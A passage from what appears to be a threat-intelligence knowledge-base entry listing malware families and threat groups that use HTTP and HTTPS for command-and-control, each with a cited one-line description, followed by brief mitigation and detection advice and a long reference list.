njRAT has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018) |
Micropsia |
Micropsia uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018) |
FIN8 |
FIN8 has used HTTPS for command and control.(Citation: Bitdefender FIN8 July 2021) |
KGH_SPY |
KGH_SPY can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020) |
PolyglotDuke |
PolyglotDuke has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019) |
Cobalt Strike |
Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: Securelist APT10 March 2021)(Citation: Kaspersky ToddyCat Check Logs October 2023) |
PowerShower |
PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018) |
httpclient |
httpclient uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
ZeroT |
ZeroT has used HTTP for C2.(Citation: Proofpoint TA459 April 2017)(Citation: Proofpoint ZeroT Feb 2017) |
Confucius |
Confucius has used HTTP for C2 communications.(Citation: Uptycs Confucius APT Jan 2021) |
Pony |
Pony has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016) |
IPsec Helper |
IPsec Helper connects to command and control servers via HTTP POST requests based on parameters hard-coded into the malware.(Citation: SentinelOne Agrius 2021) |
PowGoop |
PowGoop can send HTTP GET requests to malicious servers.(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
Industroyer |
Industroyer’s main backdoor connected to a remote C2 server using HTTPS.(Citation: ESET Industroyer) |
CosmicDuke |
CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke) |
Carbon |
Carbon can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020) |
Explosive |
Explosive has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015) |
COATHANGER |
COATHANGER uses an HTTP GET request to initialize a follow-on TLS tunnel for command and control.(Citation: NCSC-NL COATHANGER Feb 2024) |
Kazuar |
Kazuar uses HTTP and HTTPS to communicate with the C2 server. Kazuar can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017) |
Windshift |
Windshift has used tools that communicate with C2 over HTTP.(Citation: BlackBerry Bahamut) |
PUNCHBUGGY |
PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019) |
HTTPBrowser |
HTTPBrowser has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis) |
Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.(Citation: Lumen Versa 2024) |
|
RTM |
RTM has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019) |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. (Citation: Booz Allen Hamilton) |
|
Cobalt Group |
Cobalt Group has used HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017) |
Zeus Panda |
Zeus Panda uses HTTP for C2 communications.(Citation: Talos Zeus Panda Nov 2017) |
GoldMax |
GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) |
OnionDuke |
OnionDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
DarkComet |
DarkComet can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018) |
Octopus |
Octopus has used HTTP GET and POST requests for C2 communications.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) |
GeminiDuke |
GeminiDuke uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes) |
GuLoader |
GuLoader can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021) |
Chaes |
Chaes has used HTTP for C2 communications.(Citation: Cybereason Chaes Nov 2020) |
Turian |
Turian has the ability to use HTTP for its C2.(Citation: ESET BackdoorDiplomacy Jun 2021) |
During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.(Citation: Cybereason OperationCuckooBees May 2022) |
|
During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.(Citation: McAfee Lazarus Jul 2020) |
|
DRATzarus |
DRATzarus can use HTTP or HTTPS for C2 communications.(Citation: ClearSky Lazarus Aug 2020) |
IcedID |
IcedID has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)(Citation: DFIR_Quantum_Ransomware)(Citation: DFIR_Sodinokibi_Ransomware) |
REvil |
REvil has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019) |
Elise |
Elise communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015) |
down_new |
down_new has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019) |
BLUELIGHT |
BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.(Citation: Volexity InkySquid BLUELIGHT August 2021) |
APT33 |
APT33 has used HTTP for command and control.(Citation: Symantec Elfin Mar 2019) |
TA551 |
TA551 has used HTTP for C2 communications.(Citation: Unit 42 Valak July 2020) |
QUIETCANARY |
QUIETCANARY can use HTTPS for C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Egregor |
Egregor has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020) |
VBShower |
VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019) |
IceApple |
IceApple can use HTTP GET to request and pull information from C2.(Citation: CrowdStrike IceApple May 2022) |
Shark |
Shark has the ability to use HTTP in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
AppleSeed |
AppleSeed has the ability to communicate with C2 over HTTP.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi) |
Gold Dragon |
Gold Dragon uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon) |
Bazar |
Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: DFIR Conti Bazar Nov 2021) |
BackConfig |
BackConfig has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020) |
RedLeaves |
RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.(Citation: FireEye APT10 April 2017)(Citation: Accenture Hogfish April 2018) |
APT29 |
APT29 has used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
Carberp |
Carberp has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010) |
Clambling |
Clambling has the ability to communicate over HTTP.(Citation: Trend Micro DRBControl February 2020) |
RIPTIDE |
APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.(Citation: Moran 2014) |
NOKKI |
NOKKI has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018) |
Gamaredon Group |
Gamaredon Group has used HTTP and HTTPS for C2 communications.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)(Citation: unit42_gamaredon_dec2022) |
Manjusaka |
Manjusaka has used HTTP for command and control communication.(Citation: Talos Manjusaka 2022) |
ShadowPad |
ShadowPad communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017) |
Sys10 |
Sys10 uses HTTP for C2.(Citation: Baumgartner Naikon 2015) |
During C0018, the threat actors used HTTP for C2 communications.(Citation: Costa AvosLocker May 2022) |
|
MarkiRAT |
MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021) |
OLDBAIT |
OLDBAIT can use HTTP for C2.(Citation: FireEye APT28) |
Ke3chang |
Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021) |
Komplex |
The Komplex C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan) |
Gelsemium |
Gelsemium can use HTTP/S in C2 communications.(Citation: ESET Gelsemium June 2021) |
APT41 DUST used HTTPS for command and control.(Citation: Google Cloud APT41 2024) |
|
FIN4 |
FIN4 has used HTTP POST requests to transmit data.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014) |
SUGARDUMP |
A SUGARDUMP variant has used HTTP for C2.(Citation: Mandiant UNC3890 Aug 2022) |
Cardinal RAT |
Cardinal RAT is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017) |
OwaAuth |
OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390) |
OutSteel |
OutSteel has used HTTP for C2 communications.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
Daserf |
Daserf uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017) |
NETWIRE |
NETWIRE has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020) |
Ninja |
Ninja can use HTTP for C2 communications.(Citation: Kaspersky ToddyCat June 2022) |
DownPaper |
DownPaper communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017) |
APT18 |
APT18 uses HTTP for C2 communications.(Citation: PaloAlto DNS Requests May 2016) |
Remsec |
Remsec is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis) |
APT39 |
APT39 has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020) |
MiniDuke |
MiniDuke uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019) |
Threat Group-3390 |
Threat Group-3390 malware has used HTTP for C2.(Citation: Securelist LuckyMouse June 2018) |
Get2 |
Get2 has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019) |
Winnti for Windows |
Winnti for Windows has the ability to use encapsulated HTTP/S in C2 communications.(Citation: Novetta Winnti April 2015) |
HAFNIUM |
HAFNIUM has used open-source C2 frameworks, including Covenant.(Citation: Microsoft HAFNIUM March 2020) |
WIREFIRE |
WIREFIRE can respond to specific HTTP `POST` requests to `/api/v1/cav/client/visits`.(Citation: Mandiant Cutting Edge January 2024)(Citation: Volexity Ivanti Zero-Day Exploitation January 2024) |
STEADYPULSE |
STEADYPULSE can parse web requests made to a targeted server to determine the next stage of execution.(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Samurai |
Samurai can use a .NET HTTPListener class to receive and handle HTTP POST requests.(Citation: Kaspersky ToddyCat June 2022) |
Lokibot |
Lokibot has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) |
Small Sieve |
Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
InvisiMole |
InvisiMole uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018) |
ShimRatReporter |
ShimRatReporter communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang) |
Grandoreiro |
Grandoreiro has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020) |
GoldFinder |
GoldFinder has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021) |
Neoichor |
Neoichor can use HTTP for C2 communications.(Citation: Microsoft NICKEL December 2021) |
Cyclops Blink |
Cyclops Blink can download files via HTTP and HTTPS.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022) |
Amadey |
Amadey has used HTTP for C2 communications.(Citation: BlackBerry Amadey 2020) |
TinyTurla |
TinyTurla can use HTTPS in C2 communications.(Citation: Talos TinyTurla September 2021) |
TeamTNT |
TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Cisco Talos Intelligence Group) TeamTNT has also used a custom user agent HTTP header in shell scripts.(Citation: Trend Micro TeamTNT) |
Rocke |
Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019) |
TrickBot |
TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019) |
Trojan.Karagany |
Trojan.Karagany can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019) |
VaporRage |
VaporRage can use HTTP to download shellcode from compromised websites.(Citation: MSTIC Nobelium Toolset May 2021) |
SUNBURST |
SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020) |
GrimAgent |
GrimAgent has the ability to use HTTP for C2 communications.(Citation: Group IB GrimAgent July 2021) |
Shamoon |
Shamoon has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016) |
WellMess |
WellMess can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020) |
DealersChoice |
DealersChoice uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice) |
Spark |
Spark has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) |
ROKRAT |
ROKRAT can use HTTP and HTTPS for command and control communication.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021) |
BlackEnergy |
BlackEnergy communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014) |
Sandworm Team |
Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016) |
TA505 |
TA505 has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020) |
ZLib |
ZLib communicates over HTTP for C2.(Citation: Cylance Dust Storm) |
Bundlore |
Bundlore uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019) |
Sibot |
Sibot communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021) |
FRP |
FRP has the ability to use HTTP and HTTPS to enable the forwarding of requests for internal services via domain name.(Citation: FRP GitHub) |
During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
|
Brute Ratel C4 |
Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022) |
DarkTortilla |
DarkTortilla has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022) |
Контрмеры |
|
Контрмера | Описание |
---|---|
Network Intrusion Prevention |
Use intrusion detection signatures to block traffic at network boundaries. |
Обнаружение
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2) Monitor for web traffic to/from known-bad or suspicious domains.
Ссылки
- Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
- The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.
- Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.
- Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
- FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
- Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
- Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
- Perez, D. et al. (2021, April 20). Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day. Retrieved February 5, 2024.
- Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
- NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
- Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
- Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
- Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
- Kaspersky Lab's Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.
- Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
- Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.
- Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
- Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.
- Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.
- Lin, M. et al. (2024, January 31). Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation. Retrieved February 27, 2024.
- CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
- Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
- Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
- Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
- Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.
- Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
- Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
- Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.
- Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.
- Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
- Microsoft Threat Intelligence. (2024, May 28). Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks. Retrieved August 26, 2024.
- Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.
- FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
- Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.
- Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
- Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
- Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
- Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.
- FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
- Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
- ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.
- Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
- Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.
- CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.
- Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
- Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.
- US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
- Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
- Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
- Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.
- Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.
- Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
- Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
- Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
- FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
- Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
- Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
- Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
- F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
- Tom Hegel. (2023, March 16). Winter Vivern | Uncovering a Wave of Global Espionage. Retrieved July 29, 2024.
- CERT-UA. (2023, February 1). UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities (CERT-UA#5909). Retrieved July 29, 2024.
- Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.
- DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.
- Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
- Ahn Ho, Facundo Muñoz, & Marc-Etienne M.Léveillé. (2024, March 7). Evasive Panda leverages Monlam Festival to target Tibetans. Retrieved July 25, 2024.
- FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
- Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
- Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
- Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014.
- ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
- Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
- Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.
- MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.
- Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
- DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.
- DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023.
- Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
- Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.
- Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
- Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
- Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.
- Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.
- Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.
- Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.
- Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
- Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
- Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.
- Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.
- Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
- Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.
- Jenkins, L. at al. (2022, August 4). ROADSWEEP Ransomware - Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations. Retrieved August 6, 2024.
- Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.
- Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
- Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
- Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
- Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.
- Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.
- Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
- Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
- ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
- F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
- Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
- Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
